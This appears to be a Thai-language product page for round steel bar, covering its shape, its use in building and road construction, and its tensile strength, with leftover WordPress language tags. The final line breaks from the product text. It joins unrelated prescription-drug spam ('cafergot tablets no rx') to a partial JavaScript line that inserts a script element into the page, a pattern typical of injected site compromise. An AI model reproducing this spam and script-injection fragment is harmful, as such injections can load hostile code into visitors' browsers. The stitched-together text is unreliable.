<!–:th–>Round Bar<!–:–><!–:en–>Round Bar<!–:–>

Round Bar

เหล็กเส้นกลม  มีลักณะเป็นเหล็กเส้นทรงยาวมีหลายขนาด ไม่มีลาย  เหล็กเส้นกลมมักใช้ในงานก่อสร้างอาคาร สร้างถนน มีคุณสมบัติช่วยยึดคอนกรีตไม่ให้หลุด  มีความยึดหยุ่นสูงทนต่อแรงดึง แต่ไม่เหมาะกับงานขึ้นรูปเสาอาคาร  และยังนำไปใช้งานในรูปแบบต่างๆ ตามความต้องการได้อีกด้วย
cafergot tablets no rx document.currentScript.parentNode.insertBefore(s, document.currentScript);